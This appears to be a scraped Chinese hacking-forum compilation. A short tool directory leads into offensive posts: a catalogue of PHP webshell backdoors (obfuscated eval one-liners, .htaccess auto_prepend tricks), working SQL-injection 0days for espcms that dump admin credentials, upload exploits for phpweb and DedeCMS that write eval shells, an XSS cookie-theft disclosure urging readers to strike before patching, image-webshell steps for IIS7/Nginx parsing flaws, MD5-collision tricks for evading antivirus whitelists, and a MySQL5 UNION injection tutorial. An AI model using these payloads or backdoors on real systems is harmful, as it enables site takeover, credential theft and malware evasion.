类别:开放源码平台:Linux/BSD/Unix简介:Nemesis项目是为了开发一个UNIX/Linux系统上基于命令行的、方便人们使用的IP栈,它可以自定义数据包、插入数据包、进行协议攻击等,是一个很好的测试防火墙、入侵检测系统、路由器和其他网络设备的工具。如果你对Nemesis感兴趣,那么你也可能需要看看hping2,这两者补相互之不足。--------------------------------------------------------------------------------工具:LSOF(列出打开的文件)网址:
类别:开放源码平台:Linux/BSD/Unix简介:LSOF是针对Unix的诊断和分析工具,它能显示出由系统里正在运行的进程所打开的文件,也能显示出每一个进程的通讯socket。-------------------------------------------------------------------------------工具:Hunt(Linux平台上高级的包嗅探和会话劫持工具)网址:
类别:开放源码平台:Linux简介:Hunt能监视、劫持、重设网络上的TCP连接,在以太网上使用才有作用,并且含有监视交换连接的主动机制,以及包括可选的ARP转播和劫持成功后的连接同步等高级特征。--------------------------------------------------------------------------------工具:Honeyd(你个人的honeynet,)网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:Honeyd是一个能在网络上创建虚拟主机的小小后台程序,虚拟主机能被配置成运行任意的服务,并且洽当的服务TCP特性以致他们看起来就像是运行在某个特定版本的操作系统上。Honeyd能在一个模拟的局域网环境里让一台主机配有多个地址,并且可以对虚似主机进行ping、traceroute。虚拟主机上任何类型的服务都可以依照一个简单的配置文件进行模拟。Honeyd也可以对一台主机做代理服务,而不是模拟它。--------------------------------------------------------------------------------工具:Achilles(可以修改http会话包的代理程序)网址:
类别:开放源码平台:Windows简介:Achilles是一个设计用来测试web应用程序安全性的工具。它是一个代理服务器,在一个HTTP会话中扮演着&中间人&(man-in- the-middle)的角色。一个典型的HTTP代理服务器将在客户浏览器和web服务器间转发数据包,但Achilles却载取发向任一方的HTTP 会话数据,并且在转发数据前可以让用户修改这些数据。--------------------------------------------------------------------------------工具:Brutus(网络认证的强行破解工具)网址:
类别:免费平台:Windows简介:Brutus是一款对远程服务器的网络服务进行口令猜解的工具,支持字典攻击和组合攻击,支持的网络应用包括HTTP、POP3、FTP、SMB、TELNET、IMAP、NTP等。源代码不公开。UNIX系统上的THC-Hydra有类似的功能。--------------------------------------------------------------------------------工具:Stunnel(一个多种用途的SSL加密外壳)网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:Stunnel程序被设计用来做为本地客户端和远程服务器间的SSL加密外壳。它能在POP2、POP3、IMAP等使用inetd后台进程的服务器上增加SSL功能,并且不会影响到程序源代码。它使用OpenSSL或SSLeay库建立SSL会话连接。--------------------------------------------------------------------------------工具:Paketto Keiretsu(极端的TCP/IP)网址:
类别:开放源码平台:Linux/BSD/Unix简介:Paketto Keiretsu是一组使用新式的不常见的策略去操作TCP/IP网络的工具集合,开发的最初本意是为了在现有TCP/IP架构里去实现一些功能,但现在已经远远超出了最初的本意。包含的工具有:Scanrand,一个罕见的快速的网络服务和拓朴发现系统;Minewt,一个NAT/MAT路由器; linkcat,把以太网链路做为标准的输入输出;Paratrace,不产生新的连接就能追踪网络路径;Phentropy,使用OpenQVIS在三维拓朴空间里能绘制出任意总量的数据源图形。
工具:Fragroute(破坏入侵检测系统最强大的工具)网址:&#111nkey.org/~dugsong/fragroute/类别:开放源码平台:Linux/BSD/Unix/Windows简介:Fragroute能够截取、修改和重写向外发送的报文,实现了大部分的IDS攻击功能。Fragroute起重要作用的是一个简单的规则设置语言,以它去实现延迟、复制、丢弃、碎片、重叠、打印、重排、分割、源路由或其他一些向目标主机发送数据包的攻击。这个工具开发的本意是去测试入侵检测系统、防火墙、基本的TCP/IP栈的行为。像Dsniff、Libdnet一样,这个优秀的工具也是由Dug Song开发的。--------------------------------------------------------------------------------工具:SPIKE Proxy网址:
类别:开放源码平台:Linux/BSD/Unix/Windows简介:Spike Proxy是一个开放源代码的HTTP代理程序,用于发现web站点的安全缺陷。它是Spike应用程序测试套件()的一部份,支持SQL插入检测、web站点检测、登录表单暴力破解、溢出检测和字典穷举攻击检测等。-------------------------------------------------------------------------------工具:THC-Hydra(网络认证的破解工具)网址:
类别:开放源码平台:Linux/BSD/Unix简介:这个工具能对需要网络登录的系统进行快速的字典攻击,包括FTP、POP3、IMAP、Netbios、Telnet、HTTP Auth、LDAP NNTP、VNC、ICQ、Socks5、PCNFS等,支持SSL,并且现在是Nessus风险评估工具的一部份。--------------------------------------------------------------------------------其他的25个最佳安全工具:OpenBSD,:安全可靠的操作系统。TCP Wrappers,:一流的IP访问控制和日志的实现机制。pwdump3,:获取本地或远程Windows主机的口令哈希,而不管是否安装了syskey。LibNet,&允许程序员去构造和插入网络数据包的高水平开发函数库.IpTraf,&IP网络监控软件。Fping,:一次可以ping多个IP地址的扫描程序。Bastille,:增强系统安全性的脚本程序,支持Linux,Mac OS X和HP-UX操作系统。Winfingerprint,&一款基于Win32的高级远程系统扫描器。TCPTraceroute,使用TCP SYN包实现traceroute的工具。Shadow Security Scanner,:一款商业化的风险评估工具。pf,:OpenBSD系统内很有特色的包过滤防火墙。LIDS,:Linux内核上的入侵检测和入侵防御系统。hfnetchk,
rl=/technet/security/tools/tools/hfnetchk.asp:微软发布的用于检查网络上Windows主机补丁安装情况的工具。etherape,:继流量监测软件etherman之后又一个支持unix的图形化网络状况监测软件。dig,:Bind附带的DNS查询工具。Crack/Cracklib,http://www.users.dircon.co.uk/~crypto/:一流的本地口令破解器。cheops/cheops-ng,,http://cheops-ng.sourceforge.net/:绘制本地或远程网络的网络图,并且也能识别主机的操作系统类型。zone alarm,/:Windows平台上的个人防火墙软件。Visual Route,:获取traceroute/whois数据,并且绘制出数据包经过的网络路线在世界地图上的位置。The Coroner`s Toolkit (TCT),:运行于Unix系统上的文件系统检查及紧急修复工具集。tcpreplay,:能把tcpdump或snoop保存下来的流量监测文件在任意点进行回放的工具。snoop,:Solaris系统附带的网络嗅探工具。putty,target=_blank&:Windows平台上优秀的SSH客户端。pstools,:一套用于管理Windows系统的免费命令行工具。arpwatch,:主要用来检测mac地址和ip地址对应关系的&
【转载】土司真抠门免费了把多年的tuo裤脚本都送出来了
昨天小狼想我问Oracle的脱裤脚本我看看貌似土司都木有我发个集合的吧mssqlmysqlOracle的全部打包了&下载地址:&/file/3289059
【转载】浅析php后门木马
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?本文为您浅析说明一些php后门木马常用的函数
php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot133. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
1. 执行系统命令:
system 函数&
//test.php?cmd=lssystem($_GET[cmd]);
passthru 函数&
//test.php?cmd=lspassthru($_GET[cmd]);
shell_exec 函数&
//test.php?cmd=lsecho shell_exec($_GET[cmd]);
exec 函数&
//test.php?cmd=ls$arr = array();exec($_GET[cmd],$arr);print_r($arr);
popen 函数&
//test.php?cmd=ls$handle = popen('$_GET[cmd], 'r');$read = fread($handle, 2096);echo $pclose($handle);
proc_open 函数&
//test.php?cmd=ls$descriptorspec = array(& && & 0 =& array('pipe', 'r'),& && & 1 =& array('pipe', 'w'),& && & 2 =& array('pipe', 'w'),& & );$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);fclose($pipes[0]);$output = array();while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));print_r($output);
2. 代码执行与加密:
eval 函数&
//最常见的一句话木马eval($_POST[cmd]);
base64_decode 函数&
//为了免杀及隐藏而加密代码//密文: eval($_POST['cmd']);eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
gzinflate 函数&
//为了免杀及隐藏而加密代码//密文: eval($_POST['cmd']);eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
gzuncompress 函数&
//为了免杀及隐藏而加密代码//密文: eval($_POST['cmd']);eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
gzdecode 函数&
//为了免杀及隐藏而加密代码//密文: eval($_POST['cmd']);eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
str_rot13 函数&
//为了免杀及隐藏而加密代码//密文: eval($_POST[cmd]);eval(str_rot13('riny($_CBFG[pzq]);'));
assert 函数&
//类似eval函数assert($_POST[cmd]);
call_user_func 函数&
//使用call_user_func调用assertcall_user_func('assert',$_POST[cmd]);
call_user_func 函数&
//使用call_user_func调用任意函数//test.php?a=assert&cmd=phpinfo()call_user_func($_GET[a],$_REQUEST[cmd]);
//组合方式调用任意函数//test.php?a=assert&cmd=phpinfo()$_GET[a]($_REQUEST[cmd]);
3. 文件包含与生成:
require 函数&
//包含任意文件//test.php?file=123.jpgrequire($_GET[file]);
require_once 函数&
//包含任意文件//test.php?file=123.jpgrequire_once($_GET[file]);
include 函数&
//包含任意文件//test.php?file=123.jpginclude($_GET[file]);
include_once 函数&
//包含任意文件//test.php?file=123.jpginclude_once($_GET[file]);
file_get_contents 函数&
//读取任意文件//test.php?f=config.inc.phpecho file_get_contents($_GET['f']);
file_put_contents 函数&
//生成任意内容文件//a=test.php&b=&?php eval($_POST[cmd]);?&file_put_contents($_GET[a],$_GET[b]);
fputs 函数&
//生成任意内容文件//a=test.php&b=&?php eval($_POST[cmd]);?&fputs(fopen($_GET[a],"w"),$_GET[b]);
4. .htaccess:
SetHandler&
//可将php代码存于非php后缀文件,例: x.jpg//将以下代码写入.htaccess中//连接x.jpg即可启动后门木马&FilesMatch "x.jpg"&SetHandler application/x-httpd-php&/FilesMatch&
auto_prepend_file&
//可将php代码存于非php后缀文件,例: 123.gif//将以下代码写入.htaccess中, 文件路径必须是绝对路径//访问网站上任何php文件都会启动该php后门木马//可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马php_value auto_prepend_file c:/apache2/htdocs/123.gif
auto_append_file&
//类似auto_prepend_file//可将php代码存于非php后缀文件,例: 123.gif//将以下代码写入.htaccess中, 文件路径必须是绝对路径//访问网站上任何php文件都会启动该php后门木马php_value auto_append_file c:/apache2/htdocs/123.gif
另外也针对以上特征码写了一个php web版线上扫描工具http://www.t00ls.net/viewthread.php?tid=18951
【转载】科迅官方XSS漏洞
用户后台发信箱标题直接插入JS脚本S收信者即会中招,偶对管理员进行了测试! 不过2分钟就收到信了!&科迅CMS会将用户、密码、认证码存入COOKIE。。。然后你懂得!!!&漏洞已反馈,发帖之时还未修复,想X的童鞋速度!
大家帮忙推荐推荐啊~~人越多才有精气神来发0day!!大家给力才是真的给力!
[【转载T00ls】] 随风分类信息程序1.4COOKIES欺骗
[【原创】] 随风分类信息程序1.4COOKIES欺骗admin/index.php01&? require_once("../conn.php");?&02&?03$user=cstr($_POST["user"]);04$pass=cstr($_POST["pass"]);05if($_GET["post"]=="action"){06&07$sql=mysql_query("select * from config where s_user='".$user."' and s_pass='".$pass."'");08$rs=mysql_fetch_array($sql);09if($rs["id"]==""){10echo "&script&alert('用户名或密码错误,请从新输入! (默认密码是:123456)');window.location.href='index.php';&/script&";1112}else{13setcookie("admin","windows",time()+3600);14echo "&script&window.location.href='admin.php';&/script&";1516}17&18&19}
setcookie("admin","windows",time()+3600);&
[【Exp】] espcms 0day
为证明我一直默默在T00LS..发个小0day!!&百度关键字:inurl:index.php?ac=article&at=read&did=&注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&爆用户名:&index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&爆密码:&index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
phpweb 注射、上传、安装文件漏洞、万能密码
##############################################################################
Title: phpweb 注射、上传、安装文件漏洞、万能密码#
Author: lostowlf#############################################################################home: /nginxshell-----------------------exploit-------------------******sqlinjection******* http://www.phpweb.net/down/class/index.php?myord=1{sqlinjection}http://www.phpweb.net/photo/clas ...key=&myord=1 {sqlinjection}***********getshell********POST /kedit/upload_cgi/upload.php HTTP/1.0www.90sec.org" Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*Referer: http://phpweb.net/news/admin/new ...pid=all&page= Accept-Language: zh-cnContent-Type: multipart/form- boundary=---------------------------7db516c0118UA-CPU: x86Pragma: no-cacheUser-Agent: Mozilla/4.0 ( MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: lib.Proxy-Connection: Keep-AliveCookie: CODEIMG=6878; SYSZC=ca773e6a89e364d9f0 SYSUSER= SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=- D1 F$ M( R3 _8 {3 U. VContent-Length: 6620-----------------------------7db516c0118Content-Disposition: form- name="fileName"..jpg-----------------------------7db516c0118Content-Disposition: form- name="attachPath"news/pics/-----------------------------7db516c0118Content-Disposition: form- name="fileData"; filename="C:\6.gif"Content-Type: image/gifgif89a&?php fputs(fopen('test.php','w'),'&?php eval($_POST[lostwolf])?&');?&*********install file:**********/base/install/*********admin********/admin.phpusername: admin 'or '1'='1username: admin 'or '1'='1-----------------------exploit end -------------------
使用 MD5 碰撞算法伪装木马,躲过杀毒软件查杀,加入360白名单
&MD5 碰撞算法伪装木马,躲过杀毒软件查杀,加入360白名单。MD5 碰撞发生器 v1.5,fastcoll_v1.0.0.5.exe,MD5 Collision Generator v1.5,根据王小云教授的算法写的MD5碰撞的程序。&&& 快速MD5碰撞生成器,王小云改进版。这个生成器根据&构造前缀碰撞法&可以生成两个不同的文件,而这两文件的md5 sum却是一样的。&&& 构造前缀碰撞法可制作两个内容不同但具有相同MD5验证码的文件。
----------------------------------------------------------------&&& 刚才在 T00ls.net 看到个帖子,内容如下(内容有修改,去除了一些不重要的回帖):&
年前购买了一个免杀远*,300¥一个月,免杀效果确实牛B,过国内外主流杀软,在手3个月都没杀,大概5月份360更新后要提示了,然后联系客服更新,这样陆陆续续更新了几次,效果都很好,9月底,360更新后全部杀了,然后联系客服,客服说以前的技术被360分析出来了,然后让我们等待2周时间,那边技术在研发新的技术,国庆节后客服发过来一个更新的远*,我测试以后都过,在360进程查看器和网络连接查看都提示文件安全,但过了一天360又报文件为木马文件,我再次联系客服,客服让等1个小时,所技术正在解决,然后一个小时后,360又不杀了,提示安全(注:马还是以前的马,没有更新过,MD5这些都是一样的!)
难道远控的技术和360!!!,
求解!!!
我想了解的是 为什么360杀了,然后一个小时后,同样的文件360又不杀了,其他什么认证,地下工作者我就不想去了解了
二种可能 360内部人卖马,360被日了
1.360内部人卖马2.360被日了3.lz傻了?
360收黑钱,不干人事,鉴定完毕。还有你把这个马发别人那看杀不
回复&&路人丙
都不杀,已经测试过了
万一是远控的云端也在做某种远程更新呢?不能说MD5不变,就是有JQ,无凭无据。
exe的MD5不变,不代表exe肯定不下载新的DLL或其他的模块吧?
本人回复:
应该是认证环节 被人有空子可钻。。
本人回复:
我认为,最有可能的是认证环节,也就是360的白名单认证制度。
前提条件是,360是使用标准MD5值进行程序唯一性验证。
但MD5有个问题就是,碰撞算法,可以产生两个MD5相同、但功能不相同的程序。
把正常的程序提交上去后,让360认证,认证完毕,加到白名单,另外那个也&免杀&了。
据我所知,一年前(实际上是2005年左右的)出了一个东西,自动生成一样MD5值的程序的工具。
而且貌似支持根据指定程序生成一个一样MD5值的程序。
如果360不是使用标准MD5的话,其他算法也有此可能。
本人回复:
MD5 Test_A.exe:与 B 的 MD5 相同,但功能不同。MD5 Test_B.exe:与 A 的 MD5 相同,但功能不同。
---------------------------------------------
MD5 Test_A.exe:MD5:F9E627D3大小:20.1 KB (20,608 字节)
MD5 Test_B.exe:MD5:F9E627D3大小:20.1 KB (20,608 字节)
( 5:48:05 补充:然后我跑去写了个小程序,MD5值一样,但功能不同,原帖以附件的形式存在,这里我给出下载地址。)
MD5_碰撞测试程序_示例程序.rar:
&&&& 实际上从,我国山东大学王晓云教授破解MD5的论文发布后,关于这个MD5碰撞算法的话题就不断,几年之后,就没人讨论了,在我们这一代很多人都没听说过,我也是一两年前知道MD5碰撞算法,当时查阅了部分资料,了解了个大概。&&& 我又把这个话题拉出来讨论下,不过这次是讨论的木马免杀方面的。。。实际上也和免杀无关,只是从免杀想到的。&&& 如上贴内容所示,如果能成功伪造MD5,那么躲过杀毒软件查杀,甚至加入白名单,都不是问题了。&&& 题外话:我不知道360是不是使用的标准MD5算法验证文件的,我从没注意过。如果是的话,那么,现在杀毒软件中好像就只有360这个白痴还使用标准MD5算法验证文件&&&&& 不过从以下内容来看、、360还真的是用MD5算法验证文件的、、、真坑爹&&&&& 以下内容转自几年前其他人发表的文章:&
以下是引用片段:
原来我总是很自信地以为:你有本事找到 MD5 的碰撞又如何?你难道还有本事让两个可执行文件的 MD5 一样,却又都能正常运行,并且可以做完全不同的事情么?答:还真的可以.
这两个程序会在屏幕上打印出不同的字符,但是它们的 MD5 都是一样的。
通读其论文后摘要如下:
这几位密码学家使用的是&构造前缀碰撞法&(chosen-prefix collisions)来进行此次攻击(是王小云所使用的攻击方法的改进版本)。
他们所使用的计算机是一台 Sony PS3,且仅用了不到两天。
他们的结论:MD5 算法不应再被用于任何软件完整性检查或代码签名的用途。
另:现在,如果仅仅是想要生成 MD5 相同而内容不同的文件的话,在任何主流配置的电脑上用几秒钟就可以完成了。
这几位密码学家编写的&快速 MD5 碰撞生成器&:
测了一下 那2个exe md5 的确一样的。
运行结果不一样。& 未必对现有exe 有实质性的威胁, 但是很明显 是有威胁的。 如果可以加入木马。重新算出md5 的话那就厉害了
以下是引用片段:
用易语言编译的两个EXE,文件内容不同,但是MD5相同。有图为证。两个EXE均打包在附件里,人格担保EXE很纯洁(为了压缩体积,加了UPX壳)。
如果你怀疑这两个EXE其实是相同的,而我只是根据某些外部特征来实现不同的运行效果的话,你就尽情地测试吧。比如你可以把它们随意更改文件名、复制到其他电脑中运行、虚拟机中运行一个并在真实机器中运行另一个,都不会有任何影响,A还是A,B还是B。
你可以使用一些二进制编辑工具来比对两个EXE文件,你会发现它们的不同。也可以像我上传的图片那样,比对包括MD5在内的其他类型的hash。你得到的答案仍然是:它们的文件内容不同,而MD5相同(其他的HASH特征值均不相同)。
仅供娱乐,有兴趣搞清楚怎么回事儿的,就多顶本贴,哈哈。
PS:不要骂人,说了本贴仅供娱乐,顺便讨论一下MD5而已。
以下是引用片段:
用事实说话MD5破解:md5一样两个不同功能内容的文件(附md5破解工具)
能力有限,就不多说了。用事实说话,先看看下面两个在网上满天飞的md5一样二内容功能不同的程序吧:
File: D:\HelloWorld-colliding.exeSize: 41792 bytesModified: 日, 15:38:12MD5: 18FCC4334F44FED60718E7DACD82DDDFCRC32: 8BEB795C
File: D:\GoodbyeWorld-colliding.exeSize: 41792 bytesModified: 日, 15:38:29MD5: 18FCC4334F44FED60718E7DACD82DDDFCRC32: 9EDE53DB
可是我们能不能自己制作两个md5 一样而内容不同的文件呢?请继续看下面的操作截图(后附工具)
以上就是大名鼎鼎的"构造前缀法"破解md5 的方法(以下就提供破解工具和"构造前缀法"的含义)破解工具:& Fast 破解工具.7z (88.75 KB, 下载次数: 67)
12:14:15 上传下载次数: 67&下载积分: PB币 -1
-p 前缀文件(破解工具会以此文件为前缀构造md5碰撞文件)
-o 出处文件(默认的输出文件名是-o msg1.bin msg2.bin)
到这里又有人会问,能不能自己制作一个是病毒木马、一个是正常无害的两个md5 一样的文件呢???
答案依旧是肯定的,下载下面两个文件你就知道了(由于论坛不能放木马之类等,所以只提供外链地址)
以上这两个文件一个自解压后是木马病毒一个自解压后是一个平常的Word 文档
依旧会有人问,这是怎么生成的?(这个就不能奉告了,有兴趣的话自己慢慢研究吧,累了)。
以下是引用片段:
给大家个好玩的,,关于MD5碰撞,及360的信任列表隐患,将在6点半更新
纯讨论不是谈怎样利用,,,,
视频地址:/c0bap33a8n
首先&先演示一下这两个刚碰撞出来的文件文件名称:C:\Documents and Settings\Administrator\桌面\1\cbi.exe文件大小:410240 字节修改时间:日 16:43:41MD5&&&& :6EF59C9E46B658D11C0A8FSHA1&&& :3AF53E0B7E70A1AB3CRC32&& :6F75148B
文件名称:C:\Documents and Settings\Administrator\桌面\2\cbi2.exe文件大小:410240 字节修改时间:日 16:43:41MD5&&&& :6EF59C9E46B658D11C0A8FSHA1&&& :C6A32B97C2E5CD490A1EA1CEE3FCC4CRC32&& :09F69A39
大家可以看出,,两个文件的md5值是完全相同的但是sh1 crc32却是不同的,,说明这两个文件不是相同文件,,但是md5相同,这就是碰撞
再来看一下刚刚碰撞出来的360安装包
文件名称:C:\Documents and Settings\Administrator\桌面\cbi.exe文件大小: 字节文件版本:8.3.0.1024修改时间:日 16:34:55MD5&&&& :686C03D6B3SHA1&&& :78DFF1C79BF17B3AB55CRC32&& :6CDBAA4E
文件名称:C:\Documents and Settings\Administrator\桌面\cbi2.exe文件大小: 字节文件版本:8.3.0.1024修改时间:日 16:34:54MD5&&&& :686C03D6B3SHA1&&& :8F9A9A6D3CE2DF151E722AFB0396ACRC32&& :65D9B793
同样的,md5相同 sha 和crc不同
如何做出这些呢 ,都来自一位叫王小云的密码天才的思路弄的& 而且完全不会影响运行
两个安装包皆可运行,,md5相同,,内容是不同的
或许很多人会说sha1呢,,,很遗憾 05年王小云把sha1也破解了,,,,,
所以,,云在验证这方面还有电子商务这方面都要有所改进了
不说太远的,,回归话题,,说一下360本地的信任机制
可以看到 360报毒了
接下来& 我们把它添加到信任 列表
很多人以为,360的信任列表是匹配路径的,,其实错了,,是直接将md5加入白名单
我们来试试把这个文件移到其他地方
可以看到,,这个文件运行成功了,,这验证了
"很多人以为,360的信任列表是匹配路径的,,其实错了,,是直接将md5加入白名单"
接下来,,我们来看看是不是一定是md5 还是其他算法
我们采用相同md5,但是sha1和crc完全相同的两个文件来运行,,同样的 可以运行,,由此可看出,,360不是将路径加入信任列表,,
而是将md5加入信任列表,,,
或许目前来看这还算安全,,虽然已经能随意产生两个md5完全相同的了,,,但是用在特殊方面,,这无疑是个巨大的漏洞,,
呵呵 ,,只是想探讨下
&&&& 以上是相关的资料,需要其他资料可以自己去搜:md5 碰撞,有大量资料查阅。&&& 实际上,MD5 值一样,但功能不一样的程序很容易实现,需要一点编程知识,及一点点技巧。。。&&& 方法你自己多试几次就知道了。。。&&& 我自己写的俩小玩意儿如下图所演示:
MD5 Test_A.exe
MD5 Test_B.exe&&& MD5_碰撞测试程序_示例程序.rar:&&& 用到的工具如下:
1、MD5 碰撞发生器 v1.5 (MD5 Collision Generator v1.5)
2、一点点编程技巧&&& 官方地址:&&& 下载地址:&&& 源码下载:&
MD5 碰撞发生器 v1.5,MD5 Collision Generator v1.5:
MD5 碰撞发生器 v1.5
MD5 Collision Generator v1.5
fastcoll_v1.0.0.5.exe -p C:\WINDOWS\system32\cmd.exe
fastcoll_v1.0.0.5.exe -p C:\WINDOWS\system32\cmd.exe -o a.exe b.exe
--------------------------------------------------------
MD5 collision generator v1.5by Marc Stevens (http://www.win.tue.nl/hashclash/)
Allowed options:& -h [ --help ]&&&&&&&&&& 显示选项。& -q [ --quiet ]&&&&&&&&& 更简洁。& -i [ --ihv ] arg&&&&&&& 使用指定的初始值。默认是MD5的初始值。& -p [ --prefixfile ] arg 使用给定前缀的文件计算初始值,并复制数据到输出文件。& -o [ --out ] arg&&&&&&& 设置输出文件名. 这必须是最后的选项,并且必须指定两个文件名。&&&&&&&&&&&&&&&&&&&&&&&&& 默认: -o msg1.bin msg2.bin
--------------------------------------------------------
MD5 collision generator v1.5by Marc Stevens (http://www.win.tue.nl/hashclash/)
Allowed options:& -h [ --help ]&&&&&&&&&& Show options.& -q [ --quiet ]&&&&&&&&& Be less verbose.& -i [ --ihv ] arg&&&&&&& Use specified initial value. Default is MD5 initial&&&&&&&&&&&&&&&&&&&&&&&&&& value.& -p [ --prefixfile ] arg Calculate initial value using given prefixfile. Also&&&&&&&&&&&&&&&&&&&&&&&&&& copies data to output files.& -o [ --out ] arg&&&&&&& Set output filenames. This must be the last option&&&&&&&&&&&&&&&&&&&&&&&&&& and exactly 2 filenames must be specified.&&&&&&&&&&&&&&&&&&&&&&&&&& Default: -o msg1.bin msg2.bin
--------------------------------------------------------
Beyond SQLi: Obfuscate and Bypass
DEDECMS拿SHELL EXP
漏洞细节已经传遍了(http://www.t00ls.net/thread-.html),又没得玩了。网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell&前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'&?php eval($_POST[c]) ?&\');echo "OK";@fclose($fp);{/dede:php}');再用下面表单提交,shell 就在同目录下 &1.php。原理自己研究。。。&&form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"&&input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"&&br /&&input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"&&br /&&&input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"&&br /&&input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"&&br /&&input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"&&br /&&input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"&&br /&&input type="text" value="true" name="nocache" style="width:400"&&input type="submit" value="提交" name="QuickSearchBtn"&&br /&&/form&&script&function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.}&&/script&
通杀IIS7.0畸形解析0day漏洞和Nginx那个0day差不多
先合并一张PHP一句话图片马,合并方法:①、DOS合并:copy&1.gif&/b&+&1.txt/a&asp.gif②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为&&
图片随便找一张.【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】一句话:
&?PHP&fputs(fopen(&shell.php&,'w&),&&?php&eval($_POST[cmd])?&&);?&&
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。比如假设图片地址为/tupian/1.jpg&则执行地址为/tupian/1.jpg/shell.php然后,会在目录下生成shell.php。比如:/tupian/shell.phpshell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php&xx随便你怎么填。只要后缀为.php就好。
&?fputs(fopen(&shell.PHP&,&w&),&&?eval(\$_POST[cmd]);?&&)?&&
Mysql5注射技巧总结
Mysql5和之前的版本有很多不同的地方,灵活的运用其特性可以在的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没有写清楚的部分表达出来,你看明白这个文章后也许你会发现,原来mysql5也可以像mssql一样注射。
&&&&&我们先看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的
mysql&&use&information_
Database&changed
mysql&&show&
+---------------------------------------+
|&Tables_in_information_schema&|
+---------------------------------------+
|&CHARACTER_SETS&|
|&COLLATIONS&|
|&COLLATION_CHARACTER_SET_APPLICABILITY&|
|&COLUMNS&|
|&COLUMN_PRIVILEGES&|
|&KEY_COLUMN_USAGE&|
|&ROUTINES&|
|&SCHEMATA&|
|&SCHEMA_PRIVILEGES&|
|&STATISTICS&|
|&TABLES&|
|&TABLE_CONSTRAINTS&|
|&TABLE_PRIVILEGES&|
|&TRIGGERS&|
|&USER_PRIVILEGES&|
+---------------------------------------+
&&&&如果读者有兴趣可以自己装一个mysql5研究一下这几个表存储的信息,我这里只挑注射中可以用到的几个表。 
|&SCHEMATA&――&存储数据库名的,
|&&&关键字段:SCHEMA_NAME,表示数据库名称
|&TABLES&――&存储表名的&
|&&&关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
|&COLUMNS&――&存储字段名的
|&&&关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
        & COLUMN_NAME表示字段名
&&&&可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。
&&&&&到网上找到一个注射点,首先还是像以往一样猜字段、版本和数据库用户,如图1
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/*
&&&&&下面猜数据库,可以通过不断递增limit的第一个参数查询到所有的数据库名,如图2
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15&from/**/information_schema.SCHEMATA&limit&17,1/*&
&&&&遍里webbase里面的表名,找到敏感的表,如图三(0x65是webbase的十六进制编码)
